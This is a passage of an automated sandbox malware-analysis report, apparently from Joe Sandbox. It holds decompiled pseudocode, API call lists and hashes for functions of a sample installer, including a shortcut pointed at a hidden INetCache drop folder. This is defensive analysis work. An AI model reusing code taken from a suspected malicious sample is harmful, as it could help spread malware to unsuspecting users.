                                                          0x10001dd4
                                                          0x10001de1
                                                          0x10001de7
                                                          0x10001df1
                                                          0x10001df7
                                                          0x10001dff
                                                          0x10001e0f
                                                          0x00000000
                                                          0x10001e0f

                                                          APIs
                                                            • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                          • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 10001C24
                                                          • lstrcpyW.KERNEL32 ref: 10001C6C
                                                          • lstrcpyW.KERNEL32 ref: 10001C76
                                                          • GlobalFree.KERNEL32 ref: 10001C89
                                                          • GlobalFree.KERNEL32 ref: 10001D83
                                                          • GlobalFree.KERNEL32 ref: 10001D88
                                                          • GlobalFree.KERNEL32 ref: 10001D8D
                                                          • GlobalFree.KERNEL32 ref: 10001F38
                                                          • lstrcpyW.KERNEL32 ref: 1000209C
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.667355155.0000000010001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000002.00000002.667337465.0000000010000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                          • Associated: 00000002.00000002.667366350.0000000010003000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                          • Associated: 00000002.00000002.667376456.0000000010005000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_10000000_fcab.jbxd
                                                          Similarity
                                                          • API ID: Global$Free$lstrcpy$Alloc
                                                          • String ID:
                                                          • API String ID: 4227406936-0
                                                          • Opcode ID: 5a24c136153c29b9d98a91a4f463aeb2504b823c6cdae7135cdbbdb8769d9cc1
                                                          • Instruction ID: 952ca616c20dc2fa21031af5d26a5f3ec91fa4f9dea92b18a1e2b318678e368b
                                                          • Opcode Fuzzy Hash: 5a24c136153c29b9d98a91a4f463aeb2504b823c6cdae7135cdbbdb8769d9cc1
                                                          • Instruction Fuzzy Hash: 10129C75D0064AEFEB20CFA4C8806EEB7F4FB083D4F61452AE565E7198D774AA80DB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004020FE Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 67%
                                                          			E004020FE() {
				signed int _t52;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t80;
				void* _t83;
				intOrPtr* _t91;
				signed int _t101;
				signed int _t105;
				void* _t107;

				 *((intOrPtr*)(_t107 - 0x4c)) = E00402C37(0xfffffff0);
				 *((intOrPtr*)(_t107 - 0x3c)) = E00402C37(0xffffffdf);
				 *((intOrPtr*)(_t107 - 8)) = E00402C37(2);
				 *((intOrPtr*)(_t107 - 0x48)) = E00402C37(0xffffffcd);
				 *((intOrPtr*)(_t107 - 0xc)) = E00402C37(0x45);
				_t52 =  *(_t107 - 0x18);
				 *(_t107 - 0x44) = _t52 & 0x00000fff;
				_t101 = _t52 & 0x00008000;
				_t105 = _t52 >> 0x0000000c & 0x00000007;
				 *(_t107 - 0x38) = _t52 >> 0x00000010 & 0x0000ffff;
				if(E00405B94( *((intOrPtr*)(_t107 - 0x3c))) == 0) {
					E00402C37(0x21);
				}
				_t56 = _t107 + 8;
				__imp__CoCreateInstance(0x4084dc, _t83, 1, 0x4084cc, _t56);
				if(_t56 < _t83) {
					L14:
					 *((intOrPtr*)(_t107 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t60 =  *((intOrPtr*)(_t107 + 8));
					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084ec, _t107 - 0x30);
					 *((intOrPtr*)(_t107 - 0x10)) = _t61;
					if(_t61 >= _t83) {
						_t64 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)(_t107 - 0x10)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x3c)));
						if(_t101 == _t83) {
							_t80 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t80 + 0x24))(_t80, L"C:\\Users\\hardz\\AppData\\Local\\Microsoft\\Windows\\INetCache\\spilplatform\\Thenceforth");
						}
						if(_t105 != _t83) {
							_t78 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
						}
						_t66 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x38));
						_t91 =  *((intOrPtr*)(_t107 - 0x48));
						if( *_t91 != _t83) {
							_t76 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x44));
						}
						_t68 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
						_t70 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
						if( *((intOrPtr*)(_t107 - 0x10)) >= _t83) {
							_t74 =  *((intOrPtr*)(_t107 - 0x30));
							 *((intOrPtr*)(_t107 - 0x10)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x4c)), 1);
						}
						_t72 =  *((intOrPtr*)(_t107 - 0x30));
						 *((intOrPtr*)( *_t72 + 8))(_t72);
					}
					_t62 =  *((intOrPtr*)(_t107 + 8));
					 *((intOrPtr*)( *_t62 + 8))(_t62);
					if( *((intOrPtr*)(_t107 - 0x10)) >= _t83) {
						_push(0xfffffff4);
					} else {
						goto L14;
					}
				}
				E00401423();
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t107 - 4));
				return 0;
			}






















                                                          0x00402107
                                                          0x00402111
                                                          0x0040211b
                                                          0x00402125
                                                          0x00402130
                                                          0x00402133
                                                          0x0040214d
                                                          0x00402150
                                                          0x00402156
                                                          0x00402159
                                                          0x00402163
                                                          0x00402167
                                                          0x00402167
                                                          0x0040216c
                                                          0x0040217d
                                                          0x00402185
                                                          0x0040223c
                                                          0x0040223c
                                                          0x00402243
                                                          0x0040218b
                                                          0x0040218b
                                                          0x0040219a
                                                          0x0040219e
                                                          0x004021a1
                                                          0x004021a7
                                                          0x004021b5
                                                          0x004021b8
                                                          0x004021ba
                                                          0x004021c5
                                                          0x004021c5
                                                          0x004021ca
                                                          0x004021cc
                                                          0x004021d3
                                                          0x004021d3
                                                          0x004021d6
                                                          0x004021df
                                                          0x004021e2
                                                          0x004021e8
                                                          0x004021ea
                                                          0x004021f4
                                                          0x004021f4
                                                          0x004021f7
                                                          0x00402200
                                                          0x00402203
                                                          0x0040220c
                                                          0x00402212
                                                          0x00402214
                                                          0x00402222
                                                          0x00402222
                                                          0x00402225
                                                          0x0040222b
                                                          0x0040222b
                                                          0x0040222e
                                                          0x00402234
                                                          0x0040223a
                                                          0x0040224f
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040223a
                                                          0x00402245
                                                          0x00402ac2
                                                          0x00402ace

                                                          APIs
                                                          • CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040217D
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth, xrefs: 004021BD
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.644793479.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.644775997.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644817233.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fcab.jbxd
                                                          Similarity
                                                          • API ID: CreateInstance
                                                          • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth
                                                          • API String ID: 542301482-868909127
                                                          • Opcode ID: 6a73a02503d44bb31e679befed85152b1616c559738105c0cf9dadfb40333c17
                                                          • Instruction ID: 8d58e3acc7b173ba9b06918936dfe92dd1a067fa61399e551ad1d720d45e9931
                                                          • Opcode Fuzzy Hash: 6a73a02503d44bb31e679befed85152b1616c559738105c0cf9dadfb40333c17
                                                          • Instruction Fuzzy Hash: A64148B5A00208AFCB10DFE4C988AAEBBB5FF48314F20457AF515EB2D1DB799941CB44
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00402862 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 39%
                                                          			E00402862(short __ebx, short* __esi) {
				void* _t21;

				if(FindFirstFileW(E00402C37(2), _t21 - 0x2d4) != 0xffffffff) {
					E00406193( *((intOrPtr*)(_t21 - 0xc)), _t8);
					_push(_t21 - 0x2a8);
					_push(__esi);
					E0040624C();
				} else {
					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t21 - 4)) = 1;
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}




                                                          0x0040287a
                                                          0x00402895
                                                          0x004028a0
                                                          0x004028a1
                                                          0x004029db
                                                          0x0040287c
                                                          0x0040287f
                                                          0x00402882
                                                          0x00402885
                                                          0x00402885
                                                          0x00402ac2
                                                          0x00402ace

                                                          APIs
                                                          • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402871
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.644793479.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.644775997.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644817233.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fcab.jbxd
                                                          Similarity
                                                          • API ID: FileFindFirst
                                                          • String ID:
                                                          • API String ID: 1974802433-0
                                                          • Opcode ID: 4dcabbf17ade67e2922ca78fe286c3d9ba2f9d985751f28a6fa0d9db42db9f20
                                                          • Instruction ID: 457e94eee93b26a2a7a920d72ffedce9eee0ef57ab85e6e0c0e07cda1b0ec514
                                                          • Opcode Fuzzy Hash: 4dcabbf17ade67e2922ca78fe286c3d9ba2f9d985751f28a6fa0d9db42db9f20
                                                          • Instruction Fuzzy Hash: 72F08271A04104EFD710EBA4DD49AADB378EF00314F2045BBF911F21D1D7B44E409B2A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0040437E Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 91%
                                                          			E0040437E(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				struct HWND__* _t56;
				intOrPtr _t69;
				signed int _t75;
				signed short* _t76;
				signed short* _t78;
				long _t92;
				int _t103;
				signed int _t110;
				intOrPtr _t113;
				WCHAR* _t114;
				signed int* _t116;
				WCHAR* _t117;
				struct HWND__* _t118;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L13:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x4216b4 =  *0x4216b4 + 1;
							}
							L27:
							_t114 = _a16;
							L28:
							return E00404248(_a8, _a12, _t114);
						}
						_t56 = GetDlgItem(_a4, 0x3e8);
						_t114 = _a16;
						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
							_t113 =  *((intOrPtr*)(_t114 + 0x18));
							_v12 = _t103;
							_v16 = _t113;
							_v8 = 0x4281a0;
							if(_t103 - _t113 < 0x800) {
								SendMessageW(_t56, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorW(0, 0x7f02));
								_push(1);
								E0040462D(_a4, _v8);
								SetCursor(LoadCursorW(0, 0x7f00));
								_t114 = _a16;
							}
						}
						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
							goto L28;
						} else {
							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
								SendMessageW( *0x42a208, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
								SendMessageW( *0x42a208, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x4216b4 != 0) {
						goto L27;
					} else {
						_t69 =  *0x4226c0; // 0x641114
						_t29 = _t69 + 0x14; // 0x641128
						_t116 = _t29;
						if(( *_t116 & 0x00000020) == 0) {
							goto L27;
						}
						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00404203(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E00404609();
						goto L13;
					}
				}
				_t117 = _a16;
				_t75 =  *(_t117 + 0x30);
				if(_t75 < 0) {
					_t75 =  *( *0x4291dc - 4 + _t75 * 4);
				}
				_t76 =  *0x42a258 + _t75 * 2;
				_t110 =  *_t76 & 0x0000ffff;
				_a8 = _t110;
				_t78 =  &(_t76[1]);
				_a16 = _t78;
				_v16 = _t78;
				_v12 = 0;
				_v8 = E0040432F;
				if(_t110 != 2) {
					_v8 = E004042F5;
				}
				_push( *((intOrPtr*)(_t117 + 0x34)));
				_push(0x22);
				E004041E1(_a4);
				_push( *((intOrPtr*)(_t117 + 0x38)));
				_push(0x23);
				E004041E1(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00404203( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
				_t118 = GetDlgItem(_a4, 0x3e8);
				E00404216(_t118);
				SendMessageW(_t118, 0x45b, 1, 0);
				_t92 =  *( *0x42a214 + 0x68);
				if(_t92 < 0) {
					_t92 = GetSysColor( ~_t92);
				}
				SendMessageW(_t118, 0x443, 0, _t92);
				SendMessageW(_t118, 0x445, 0, 0x4010000);
				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
				 *0x4216b4 = 0;
				SendMessageW(_t118, 0x449, _a8,  &_v16);
				 *0x4216b4 = 0;
				return 0;
			}



















                                                          0x00404390
                                                          0x004044bd
                                                          0x0040451a
                                                          0x0040451e
                                                          0x004045eb
                                                          0x004045ed
                                                          0x004045ed
                                                          0x004045f3
                                                          0x004045f3
                                                          0x004045f6
                                                          0x00000000
                                                          0x004045fd
                                                          0x0040452c
                                                          0x00404532
                                                          0x0040453c
                                                          0x00404547
                                                          0x0040454a
                                                          0x0040454d
                                                          0x00404558
                                                          0x0040455b
                                                          0x00404562
                                                          0x0040456f
                                                          0x00404580
                                                          0x00404586
                                                          0x0040458e
                                                          0x0040459c
                                                          0x004045a2
                                                          0x004045a2
                                                          0x00404562
                                                          0x004045ac
                                                          0x00000000
                                                          0x004045b7
                                                          0x004045bb
                                                          0x004045cb
                                                          0x004045cb
                                                          0x004045d1
                                                          0x004045dd
                                                          0x004045dd
                                                          0x00000000
                                                          0x004045e1
                                                          0x004045ac
                                                          0x004044c8
                                                          0x00000000
                                                          0x004044da
                                                          0x004044da
                                                          0x004044df
                                                          0x004044df
                                                          0x004044e5
                                                          0x00000000
                                                          0x00000000
                                                          0x0040450e
                                                          0x00404510
                                                          0x00404515
                                                          0x00000000
                                                          0x00404515
                                                          0x004044c8
                                                          0x00404396
                                                          0x00404399
                                                          0x0040439e
                                                          0x004043af
                                                          0x004043af
                                                          0x004043b7
                                                          0x004043ba
                                                          0x004043be
                                                          0x004043c1
                                                          0x004043c5
                                                          0x004043c8
                                                          0x004043cb
                                                          0x004043ce
                                                          0x004043d5
                                                          0x004043d7
                                                          0x004043d7
                                                          0x004043e1
                                                          0x004043ee
                                                          0x004043f8
                                                          0x004043fd
                                                          0x00404400
                                                          0x00404405
                                                          0x0040441c
                                                          0x00404423
                                                          0x00404436
                                                          0x00404439
                                                          0x0040444d
                                                          0x00404454
                                                          0x00404459
                                                          0x0040445e
                                                          0x0040445e
                                                          0x0040446c
                                                          0x0040447a
                                                          0x0040448c
                                                          0x00404491
                                                          0x004044a1
                                                          0x004044a3
                                                          0x00000000

                                                          APIs
                                                          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040441C
                                                          • GetDlgItem.USER32 ref: 00404430
                                                          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040444D
                                                          • GetSysColor.USER32(?), ref: 0040445E
                                                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040446C
                                                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040447A
                                                          • lstrlenW.KERNEL32(?), ref: 0040447F
                                                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040448C
                                                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004044A1
                                                          • GetDlgItem.USER32 ref: 004044FA
                                                          • SendMessageW.USER32(00000000), ref: 00404501
                                                          • GetDlgItem.USER32 ref: 0040452C
                                                          • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040456F
                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 0040457D
                                                          • SetCursor.USER32(00000000), ref: 00404580
                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00404599
                                                          • SetCursor.USER32(00000000), ref: 0040459C
                                                          • SendMessageW.USER32(00000111,00000001,00000000), ref: 004045CB
                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 004045DD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.644793479.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.644775997.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644817233.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fcab.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                          • String ID: Call$N
                                                          • API String ID: 3103080414-3438112850
                                                          • Opcode ID: 868c1d48af680dab98623212c2c2391fab089ac2f5c5a3188426b6b277364ed0
                                                          • Instruction ID: b1457f7914280a06e64b3deddd6598f3d1f5c62ed4ca7ede05d387843edeb913
                                                          • Opcode Fuzzy Hash: 868c1d48af680dab98623212c2c2391fab089ac2f5c5a3188426b6b277364ed0
                                                          • Instruction Fuzzy Hash: B96173B1A00209BFDB109F60DD45EAA7B69FB94344F00813AFB05B62E0D7789952DF59
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 90%
                                                          			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42a214;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextW(_t128, 0x429200, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x42a208;
				}
				return DefWindowProcW(_a4, _a8, _a12, _t102);
			}













                                                          0x0040100a
                                                          0x00401039
                                                          0x00401047
                                                          0x0040104d
                                                          0x00401051
                                                          0x0040105b
                                                          0x00401061
                                                          0x00401064
                                                          0x004010f3
                                                          0x00401089
                                                          0x0040108c
                                                          0x004010a6
                                                          0x004010bd
                                                          0x004010cc
                                                          0x004010cf
                                                          0x004010d5
                                                          0x004010d9
                                                          0x004010e4
                                                          0x004010ed
                                                          0x004010ef
                                                          0x004010ef
                                                          0x00401100
                                                          0x00401105
                                                          0x0040110d
                                                          0x00401110
                                                          0x00401112
                                                          0x00401118
                                                          0x0040111f
                                                          0x00401126
                                                          0x00401130
                                                          0x00401142
                                                          0x00401156
                                                          0x00401160
                                                          0x00401165
                                                          0x00401165
                                                          0x00401110
                                                          0x0040116e
                                                          0x00000000
                                                          0x00401178
                                                          0x00401010
                                                          0x00401013
                                                          0x00401015
                                                          0x0040101f
                                                          0x0040101f
                                                          0x00000000

                                                          APIs
                                                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                          • GetClientRect.USER32 ref: 0040105B
                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                          • FillRect.USER32 ref: 004010E4
                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                          • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                          • DrawTextW.USER32(00000000,00429200,000000FF,00000010,00000820), ref: 00401156
                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.644793479.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.644775997.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644817233.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fcab.jbxd
                                                          Similarity
                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                          • String ID: F
                                                          • API String ID: 941294808-1304234792
                                                          • Opcode ID: dddf6588841e3707deee37d13ddb8de347a630f4291ad0a352021d00e496f588
                                                          • Instruction ID: 53e7ac87f6412b54f62e8112edad18e9e8f6d31619aee210d26213a62ff7d26c
                                                          • Opcode Fuzzy Hash: dddf6588841e3707deee37d13ddb8de347a630f4291ad0a352021d00e496f588
                                                          • Instruction Fuzzy Hash: 88418A71800209AFCF058FA5DE459AF7BB9FF44310F00842AF991AA1A0C738D955DFA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00405E98 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00405E98(void* __ecx) {
				void* __ebx;
